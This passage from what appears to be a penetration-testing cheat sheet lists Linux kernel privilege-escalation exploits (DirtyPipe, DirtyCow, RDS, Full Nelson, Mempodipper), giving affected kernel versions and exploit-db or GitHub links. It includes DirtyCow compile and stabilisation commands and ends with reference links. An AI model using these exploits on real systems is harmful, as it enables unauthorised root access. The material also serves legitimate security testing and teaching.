    818 
    819 ### CVE-2022-0847 (DirtyPipe)
    820 
    821 Linux Privilege Escalation - Linux Kernel 5.8 < 5.16.11
    822 
    823 * [Lance Biggerstaff/2022-0847](https://www.exploit-db.com/exploits/50808)
    824 
    825 ### CVE-2016-5195 (DirtyCow)
    826 
    827 Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
    828 
    829 ```powershell
    830 # make dirtycow stable
    831 echo 0 > /proc/sys/vm/dirty_writeback_centisecs
    832 g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
    833 https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
    834 https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c
    835 ```
    836 
    837 ### CVE-2010-3904 (RDS)
    838 
    839 Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
    840 
    841 ```powershell
    842 https://www.exploit-db.com/exploits/15285/
    843 ```
    844 
    845 ### CVE-2010-4258 (Full Nelson)
    846 
    847 Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04)
    848 
    849 ```powershell
    850 https://www.exploit-db.com/exploits/15704/
    851 ```
    852 
    853 ### CVE-2012-0056 (Mempodipper)
    854 
    855 Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
    856 
    857 ```powershell
    858 https://www.exploit-db.com/exploits/18411
    859 ```
    860 
    861 ## References
    862 
    863 * [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
    864 * [Privilege escalation via Docker - April 22, 2015 - Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html)
    865 * [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ - AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/)
    866 * [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
    867 * [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/)
    868 * [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt)
    869 * [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/)
    870 * [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html)
    871 * [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/)
    872 * [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
    873 
    874 * [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html)
    875 * [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
    876 * [SSH Key Predictable PRNG (Authorized_Keys) Process - @weaknetlabs](https://github.com/weaknetlabs/Penetration-Testing-Grimoire/blob/master/Vulnerabilities/SSH/key-exploit.md)
    877 * [The Dirty Pipe Vulnerability](https://dirtypipe.cm4all.com/)
    878 * [Setting the root password in preseed.cfg for unattended installation - Sebest - Mar 31, 2010](https://sebest.github.io/post/setting-the-root-password-in-preseed-cfg-for-unattended-installation/)